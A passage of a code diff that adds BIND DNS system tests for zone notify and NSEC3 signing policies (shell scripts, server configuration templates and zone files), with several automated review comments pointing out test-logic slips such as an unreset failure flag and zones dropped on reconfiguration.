+ NS ns5
+ns5 A 10.53.0.5
+a A 10.0.0.1
diff --git a/bin/tests/system/notify/setup.sh b/bin/tests/system/notify/setup.sh
new file mode 100644
index 0000000..6b36b33
--- /dev/null
+++ b/bin/tests/system/notify/setup.sh
@@ -0,0 +1,26 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+
+copy_setports ns4/named.port.in ns4/named.port
+
+cp -f ns2/example1.db ns2/example.db
+cp -f ns2/generic.db ns2/x21.db
diff --git a/bin/tests/system/notify/tests.sh b/bin/tests/system/notify/tests.sh
new file mode 100644
index 0000000..c02654e
--- /dev/null
+++ b/bin/tests/system/notify/tests.sh
@@ -0,0 +1,242 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +# +# Wait up to 10 seconds for the servers to finish starting before testing. +# +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG +tcp -p ${PORT} example @10.53.0.2 soa > dig.out.ns2.test$n || ret=1 + grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 + grep "flags:.* aa[ ;]" dig.out.ns2.test$n > /dev/null || ret=1 + $DIG +tcp -p ${PORT} example @10.53.0.3 soa > dig.out.ns3.test$n || ret=1 + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "flags:.* aa[ ;]" dig.out.ns3.test$n > /dev/null || ret=1 + nr=`grep 'x[0-9].*sending notify to' ns2/named.run | wc -l` + [ $nr -eq 20 ] || ret=1 + [ $ret = 0 ] && break + sleep 1 +done + +n=`expr $n + 1` +echo_i "checking initial status ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.1" dig.out.ns2.test$n > /dev/null || ret=1 + +$DIG $DIGOPTS a.example. 
@10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep "10.0.0.1" dig.out.ns3.test$n > /dev/null || ret=1 + +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking startup notify rate limit ($n)" +ret=0 +awk '/x[0-9].*sending notify to/ { + split($2, a, ":"); + this = a[1] * 3600 + a[2] * 60 + a[3]; + if (lasta1 && lasta1 > a[1]) { + fix = 3600 * 24; + } + this += fix; + if (last) { + delta = this - last; + print delta; + + total += delta; + if (!maxdelta || delta > maxdelta) { + maxdelta = delta; + } + if (!mindelta || delta < mindelta) { + mindelta = delta; + } + } + lasta1 = a[1]; + last = this; + count++; +} +END { + average = total / count; + print "mindelta:", mindelta; + print "maxdelta:" maxdelta; + print "count:", count; + print "average:", average; + if (average < 0.180) exit(1); + if (count < 20) exit(1); +}' ns2/named.run > awk.out.ns2.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +nextpart ns3/named.run > /dev/null + +sleep 1 # make sure filesystem time stamp is newer for reload. +rm -f ns2/example.db +cp -f ns2/example2.db ns2/example.db +if [ ! "$CYGWIN" ]; then + echo_i "reloading with example2 using HUP and waiting up to 45 seconds" + $KILL -HUP `cat ns2/named.pid` +else + echo_i "reloading with example2 using rndc and waiting up to 45 seconds" + rndc_reload ns2 10.53.0.2 +fi + +try=0 +while test $try -lt 45 +do + nextpart ns3/named.run > tmp + grep "transfer of 'example/IN' from 10.53.0.2#.*success" tmp > /dev/null && break + sleep 1 + try=`expr $try + 1` +done + +n=`expr $n + 1` +echo_i "checking notify message was logged ($n)" +ret=0 +grep 'notify from 10.53.0.2#[0-9][0-9]*: serial 2$' ns3/named.run > /dev/null || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking example2 loaded ($n)" +ret=0 +$DIG $DIGOPTS a.example. 
@10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.2" dig.out.ns2.test$n > /dev/null || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking example2 contents have been transferred after HUP reload ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.2" dig.out.ns2.test$n > /dev/null || ret=1 + +$DIG $DIGOPTS a.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep "10.0.0.2" dig.out.ns3.test$n > /dev/null || ret=1 + +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +echo_i "stopping master and restarting with example4 then waiting up to 45 seconds" +stop_server ns2 + +rm -f ns2/example.db +cp -f ns2/example4.db ns2/example.db + +start_server --noclean --restart --port "${PORT}" ns2 + +try=0 +while test $try -lt 45 +do + nextpart ns3/named.run > tmp + grep "transfer of 'example/IN' from 10.53.0.2#.*success" tmp > /dev/null && break + sleep 1 + try=`expr $try + 1` +done + +n=`expr $n + 1` +echo_i "checking notify message was logged ($n)" +ret=0 +grep 'notify from 10.53.0.2#[0-9][0-9]*: serial 4$' ns3/named.run > /dev/null || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking example4 loaded ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.4" dig.out.ns2.test$n > /dev/null || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking example4 contents have been transferred after restart ($n)" +ret=0 +$DIG $DIGOPTS a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "10.0.0.4" dig.out.ns2.test$n > /dev/null || ret=1 + +$DIG $DIGOPTS a.example. 
@10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep "10.0.0.4" dig.out.ns3.test$n > /dev/null || ret=1 + +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking notify to alternate port with master inheritance ($n)" +$NSUPDATE << EOF +server 10.53.0.2 ${PORT} +zone x21 +update add added.x21 0 in txt "test string" +send +EOF +for i in 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS added.x21. @10.53.0.4 txt -p $EXTRAPORT1 > dig.out.ns4.test$n || ret=1 + grep "test string" dig.out.ns4.test$n > /dev/null && break + sleep 1 +done +grep "test string" dig.out.ns4.test$n > /dev/null || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +n=`expr $n + 1` +echo_i "checking notify to multiple views using tsig ($n)" +ret=0 +$NSUPDATE << EOF +server 10.53.0.5 ${PORT} +zone x21 +key a aaaaaaaaaaaaaaaaaaaa +update add added.x21 0 in txt "test string" +send +EOF + +for i in 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS added.x21. -y b:bbbbbbbbbbbbbbbbbbbb @10.53.0.5 \ + txt > dig.out.b.ns5.test$n || ret=1 + $DIG $DIGOPTS added.x21. -y c:cccccccccccccccccccc @10.53.0.5 \ + txt > dig.out.c.ns5.test$n || ret=1 + grep "test string" dig.out.b.ns5.test$n > /dev/null && + grep "test string" dig.out.c.ns5.test$n > /dev/null && + break + sleep 1 +done +grep "test string" dig.out.b.ns5.test$n > /dev/null || ret=1 +grep "test string" dig.out.c.ns5.test$n > /dev/null || ret=1 +grep "sending notify to 10.53.0.5#[0-9]* : TSIG (b)" ns5/named.run > /dev/null || ret=1 +grep "sending notify to 10.53.0.5#[0-9]* : TSIG (c)" ns5/named.run > /dev/null || ret=1 + +[ $ret = 0 ] || echo_i "failed" +status=`expr $ret + $status` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/nsec3/clean.sh b/bin/tests/system/nsec3/clean.sh new file mode 100644 index 0000000..b8e8317 --- /dev/null +++ b/bin/tests/system/nsec3/clean.sh 
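Review bot: The "checking notify to alternate port with master inheritance" block in notify/tests.sh never resets `ret`: every other check sets `ret=0` right after its `echo_i`, but this one goes straight to `$NSUPDATE`. A failure in the preceding check is therefore carried over, reported as "failed" against this test and added to `status` a second time; add `ret=0` after the `echo_i` line. In this block and in the TSIG block after it, `$DIG … || ret=1` sits inside the retry loop, so one transient dig failure marks the test failed even when a later attempt succeeds; dropping `|| ret=1` inside the loops and keeping the final `grep "test string" … || ret=1` lines would match the intent of retrying. In the awk `END` block, `print "maxdelta:" maxdelta;` lacks the comma its neighbours use.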
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+rm -f dig.out.* rndc.signing.* update.out.* verify.out.*
+rm -f ns*/named.conf ns*/named.memstats ns*/named.run*
+rm -f ns*/*.jnl ns*/*.jbk ns*/managed-keys.bind
+rm -f ns*/K*.private ns*/K*.key ns*/K*.state
+rm -f ns*/dsset-* ns*/*.db ns*/*.db.signed
+
diff --git a/bin/tests/system/nsec3/ns2/named.conf.in b/bin/tests/system/nsec3/ns2/named.conf.in
new file mode 100644
index 0000000..d6caf15
--- /dev/null
+++ b/bin/tests/system/nsec3/ns2/named.conf.in
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+dnssec-policy "nsec3" {
+ nsec3param;
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm @DEFAULT_HMAC@;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "nsec3-xfr-inline.kasp" {
+ type primary;
+ file "nsec3-xfr-inline.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3";
+};
diff --git a/bin/tests/system/nsec3/ns2/setup.sh b/bin/tests/system/nsec3/ns2/setup.sh
new file mode 100644
index 0000000..1cbe02f
--- /dev/null
+++ b/bin/tests/system/nsec3/ns2/setup.sh
@@ -0,0 +1,22 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../../conf.sh
+
+echo_i "ns2/setup.sh"
+
+zone="nsec3-xfr-inline.kasp"
+echo_i "setting up zone: $zone"
+zonefile="${zone}.db"
+cp template.db.in "$zonefile"
diff --git a/bin/tests/system/nsec3/ns2/template.db.in b/bin/tests/system/nsec3/ns2/template.db.in
new file mode 100644
index 0000000..8379c37
--- /dev/null
+++ b/bin/tests/system/nsec3/ns2/template.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns2
+ns2 A 10.53.0.2
+ns3 A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+
diff --git a/bin/tests/system/nsec3/ns3/named.conf.in b/bin/tests/system/nsec3/ns3/named.conf.in
new file mode 100644
index 0000000..4324f2d
--- /dev/null
+++ b/bin/tests/system/nsec3/ns3/named.conf.in
@@ -0,0 +1,162 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+dnssec-policy "nsec" {
+ // no need to change configuration: if no 'nsec3param' is set,
+ // NSEC will be used;
+};
+
+dnssec-policy "nsec3" {
+ nsec3param;
+};
+
+dnssec-policy "optout" {
+ nsec3param optout yes;
+};
+
+dnssec-policy "nsec3-other" {
+ nsec3param iterations 11 optout yes salt-length 0;
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+/* This zone starts with NSEC, but will be reconfigured to use NSEC3. */
+zone "nsec-to-nsec3.kasp" {
+ type primary;
+ file "nsec-to-nsec3.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec";
+};
+
+/* These zones use the default NSEC3 settings. */
+zone "nsec3.kasp" {
+ type primary;
+ file "nsec3.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3";
+};
+
+zone "nsec3-dynamic.kasp" {
+ type primary;
+ file "nsec3-dynamic.kasp.db";
+ dnssec-policy "nsec3";
+ allow-update { any; };
+};
+
+/* This zone uses non-default NSEC3 settings. */
+zone "nsec3-other.kasp" {
+ type primary;
+ file "nsec3-other.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3-other";
+};
+
+/* These zones will be reconfigured to use other NSEC3 settings. */
+zone "nsec3-change.kasp" {
+ type primary;
+ file "nsec3-change.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3";
+};
+
+zone "nsec3-dynamic-change.kasp" {
+ type primary;
+ file "nsec3-dynamic-change.kasp.db";
+ dnssec-policy "nsec3";
+ allow-update { any; };
+};
+
+/* The zone will be reconfigured to use opt-out. */
+zone "nsec3-to-optout.kasp" {
+ type primary;
+ file "nsec3-to-optout.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3";
+};
+
+/* The zone will be reconfigured to disable opt-out. */
+zone "nsec3-from-optout.kasp" {
+ type primary;
+ file "nsec3-from-optout.kasp.db";
+ inline-signing yes;
+ dnssec-policy "optout";
+};
+
+/* The zone starts with NSEC3, but will be reconfigured to use NSEC. */
+zone "nsec3-to-nsec.kasp" {
+ type primary;
+ file "nsec3-to-nsec.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3";
+};
+
+/* The zone fails to load, this should not prevent shutdown. */
+zone "nsec3-fails-to-load.kasp" {
+ type primary;
+ file "nsec3-fails-to-load.kasp.db";
+ dnssec-policy "nsec3";
+ allow-update { any; };
+};
+
+/* These zones switch from dynamic to inline-signing or vice versa. */
+zone "nsec3-dynamic-to-inline.kasp" {
+ type primary;
+ file "nsec3-dynamic-to-inline.kasp.db";
+ dnssec-policy "nsec3";
+ allow-update { any; };
+};
+
+zone "nsec3-inline-to-dynamic.kasp" {
+ type primary;
+ file "nsec3-inline-to-dynamic.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3";
+};
+
+/* Test adding a NSEC3 record to an inline-signing dnssec-policy zone. */
+zone "nsec3-dynamic-update-inline.kasp" {
+ type primary;
+ file "nsec3-dynamic-update-inline.kasp.db";
+ inline-signing yes;
+ allow-update { any; };
+ dnssec-policy "nsec";
+};
+
+zone "nsec3-xfr-inline.kasp" {
+ type secondary;
+ file "nsec3-xfr-inline.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec";
+ primaries { 10.53.0.2; };
+};
diff --git a/bin/tests/system/nsec3/ns3/named2.conf.in b/bin/tests/system/nsec3/ns3/named2.conf.in
new file mode 100644
index 0000000..5c3b970
--- /dev/null
+++ b/bin/tests/system/nsec3/ns3/named2.conf.in
@@ -0,0 +1,153 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+dnssec-policy "nsec" {
+ // no need to change configuration: if no 'nsec3param' is set,
+ // NSEC will be used;
+};
+
+dnssec-policy "nsec3" {
+ nsec3param;
+};
+
+dnssec-policy "optout" {
+ nsec3param optout yes;
+};
+
+dnssec-policy "nsec3-other" {
+ nsec3param iterations 11 optout yes salt-length 0;
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+/* This zone starts with NSEC, but will be reconfigured to use NSEC3. */
+zone "nsec-to-nsec3.kasp" {
+ type primary;
+ file "nsec-to-nsec3.kasp.db";
+ inline-signing yes;
+ //dnssec-policy "nsec";
+ dnssec-policy "nsec3";
+};
+
+/* These zones use the default NSEC3 settings. */
+zone "nsec3.kasp" {
+ type primary;
+ file "nsec3.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3";
+};
+
+zone "nsec3-dynamic.kasp" {
+ type primary;
+ file "nsec3-dynamic.kasp.db";
+ dnssec-policy "nsec3";
+ allow-update { any; };
+};
+
+/* This zone uses non-default NSEC3 settings. */
+zone "nsec3-other.kasp" {
+ type primary;
+ file "nsec3-other.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3-other";
+};
+
+/* These zone will be reconfigured to use other NSEC3 settings. */
+zone "nsec3-change.kasp" {
+ type primary;
+ file "nsec3-change.kasp.db";
+ inline-signing yes;
+ //dnssec-policy "nsec3";
+ dnssec-policy "nsec3-other";
+};
+
+zone "nsec3-dynamic-change.kasp" {
+ type primary;
+ file "nsec3-dynamic-change.kasp.db";
+ //dnssec-policy "nsec3";
+ dnssec-policy "nsec3-other";
+ allow-update { any; };
+};
+
+/* The zone will be reconfigured to use opt-out. */
+zone "nsec3-to-optout.kasp" {
+ type primary;
+ file "nsec3-to-optout.kasp.db";
+ inline-signing yes;
+ //dnssec-policy "nsec3";
+ dnssec-policy "optout";
+};
+
+/* The zone will be reconfigured to disable opt-out. */
+zone "nsec3-from-optout.kasp" {
+ type primary;
+ file "nsec3-from-optout.kasp.db";
+ inline-signing yes;
+ //dnssec-policy "optout";
+ dnssec-policy "nsec3";
+};
+
+/* The zone starts with NSEC3, but will be reconfigured to use NSEC. */
+zone "nsec3-to-nsec.kasp" {
+ type primary;
+ file "nsec3-to-nsec.kasp.db";
+ inline-signing yes;
+ //dnssec-policy "nsec3";
+ dnssec-policy "nsec";
+};
+
+/* The zone fails to load, but is fixed after a reload. */
+zone "nsec3-fails-to-load.kasp" {
+ type primary;
+ file "nsec3-fails-to-load.kasp.db";
+ dnssec-policy "nsec3";
+ allow-update { any; };
+};
+
+/* These zones switch from dynamic to inline-signing or vice versa. */
+zone "nsec3-dynamic-to-inline.kasp" {
+ type primary;
+ file "nsec3-dynamic-to-inline.kasp.db";
+ inline-signing yes;
+ dnssec-policy "nsec3";
+ allow-update { any; };
+};
+
+zone "nsec3-inline-to-dynamic.kasp" {
+ type primary;
+ file "nsec3-inline-to-dynamic.kasp.db";
+ inline-signing no;
+ dnssec-policy "nsec3";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/nsec3/ns3/nsec3-fails-to-load.kasp.db.in b/bin/tests/system/nsec3/ns3/nsec3-fails-to-load.kasp.db.in
new file mode 100644
index 0000000..77b0d10
--- /dev/null
+++ b/bin/tests/system/nsec3/ns3/nsec3-fails-to-load.kasp.db.in
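Review bot: nsec3/ns3/named2.conf.in silently drops two zones that named.conf.in defines, `nsec3-dynamic-update-inline.kasp` and `nsec3-xfr-inline.kasp`, and nothing in the file says whether that is intended. If the test swaps this file in and reconfigures (inferred from the "will be reconfigured" comments; the nsec3 tests.sh hunk is outside this view), both zones are removed from the running server and any later check against them would be testing a zone that no longer exists. Either carry the two zone blocks over, or state the intent with a comment such as `/* nsec3-dynamic-update-inline.kasp and nsec3-xfr-inline.kasp are deliberately absent after reconfiguration. */`. The comment "These zone will be reconfigured" should read "These zones".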
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ IN SOA kasp. nsec3-fails-to-load.kasp. (
+ 1 ; serial
+ 30 ; refresh (30 seconds)
+ 10 ; retry (10 seconds)
+ 3600000 ; expire (5 weeks 6 days 16 hours)
+ 300 ; minimum (5 minutes)
+ )
+ NS nsec3-fails-to-load.kasp.
diff --git a/bin/tests/system/nsec3/ns3/setup.sh b/bin/tests/system/nsec3/ns3/setup.sh
new file mode 100644
index 0000000..b7c449a
--- /dev/null
+++ b/bin/tests/system/nsec3/ns3/setup.sh
@@ -0,0 +1,35 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../../conf.sh
+
+echo_i "ns3/setup.sh"
+
+setup() {
+ zone="$1"
+ echo_i "setting up zone: $zone"
+ zonefile="${zone}.db"
+ infile="${zone}.db.infile"
+ cp template.db.in "$zonefile"
+}
+
+for zn in nsec-to-nsec3 nsec3 nsec3-other nsec3-change nsec3-to-nsec \
+ nsec3-to-optout nsec3-from-optout nsec3-dynamic \
+ nsec3-dynamic-change nsec3-dynamic-to-inline \
+ nsec3-inline-to-dynamic nsec3-dynamic-update-inline
+do
+ setup "${zn}.kasp"
+done
+
+cp nsec3-fails-to-load.kasp.db.in nsec3-fails-to-load.kasp.db
diff --git a/bin/tests/system/nsec3/ns3/template.db.in b/bin/tests/system/nsec3/ns3/template.db.in
new file mode 100644
index 0000000..010b05b
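Review bot: This zone file exists to be rejected at load time, but it does not say which defect is the intended one. Two candidates are visible: there is no `$TTL` and no explicit TTL on the SOA, and the apex `NS nsec3-fails-to-load.kasp.` points at an in-zone name that has no address record. A leading comment such as `; Deliberately invalid: <reason>. tests.sh replaces this file with template.db.in and reloads.` would stop a later cleanup from "fixing" the file and silently turning the reload test into a no-op.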
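Review bot: In `setup()` the assignment `infile="${zone}.db.infile"` is never read; only `zonefile` is used by the `cp` on the next line. I would delete that line, since it suggests an intermediate unsigned input file that this script does not create. `zone` and `zonefile` are also plain globals in POSIX sh, which is harmless here but worth a one-line comment if the function grows.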
--- /dev/null
+++ b/bin/tests/system/nsec3/ns3/template.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns3
+ns3 A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+
diff --git a/bin/tests/system/nsec3/setup.sh b/bin/tests/system/nsec3/setup.sh
new file mode 100644
index 0000000..bdd1ae9
--- /dev/null
+++ b/bin/tests/system/nsec3/setup.sh
@@ -0,0 +1,30 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../conf.sh
+
+set -e
+
+$SHELL clean.sh
+
+copy_setports ns2/named.conf.in ns2/named.conf
+(
+ cd ns2
+ $SHELL setup.sh
+)
+copy_setports ns3/named.conf.in ns3/named.conf
+(
+ cd ns3
+ $SHELL setup.sh
+)
diff --git a/bin/tests/system/nsec3/tests.sh b/bin/tests/system/nsec3/tests.sh
new file mode 100644
index 0000000..0141103
--- /dev/null
+++ b/bin/tests/system/nsec3/tests.sh
@@ -0,0 +1,388 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../conf.sh
+# shellcheck source=kasp.sh
+. ../kasp.sh
+
+# Log errors and increment $ret.
+log_error() {
+ echo_i "error: $1"
+ ret=$((ret+1))
+}
+
+# Call dig with default options.
+dig_with_opts() {
+ $DIG +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@"
+}
+
+# Call rndc.
+rndccmd() {
+ "$RNDC" -c ../common/rndc.conf -p "$CONTROLPORT" -s "$@"
+}
+
+# Set zone name ($1) and policy ($2) for testing nsec3.
+set_zone_policy() {
+ ZONE=$1
+ POLICY=$2
+}
+# Set expected NSEC3 parameters: flags ($1), iterations ($2), and
+# salt length ($3).
+set_nsec3param() {
+ FLAGS=$1
+ ITERATIONS=$2
+ SALTLEN=$3
+ # Reset salt.
+ SALT=""
+}
+
+# The apex NSEC3PARAM record indicates that it is signed.
+_wait_for_nsec3param() {
+ dig_with_opts +noquestion "@${SERVER}" "$ZONE" NSEC3PARAM > "dig.out.test$n.wait" || return 1
+ grep "${ZONE}\..*IN.*NSEC3PARAM.*1.*0.*${ITERATIONS}.*${SALT}" "dig.out.test$n.wait" > /dev/null || return 1
+ grep "${ZONE}\..*IN.*RRSIG" "dig.out.test$n.wait" > /dev/null || return 1
+ return 0
+}
+# The apex NSEC record indicates that it is signed.
+_wait_for_nsec() {
+ dig_with_opts +noquestion "@${SERVER}" "$ZONE" NSEC > "dig.out.test$n.wait" || return 1
+ grep "NS SOA" "dig.out.test$n.wait" > /dev/null || return 1
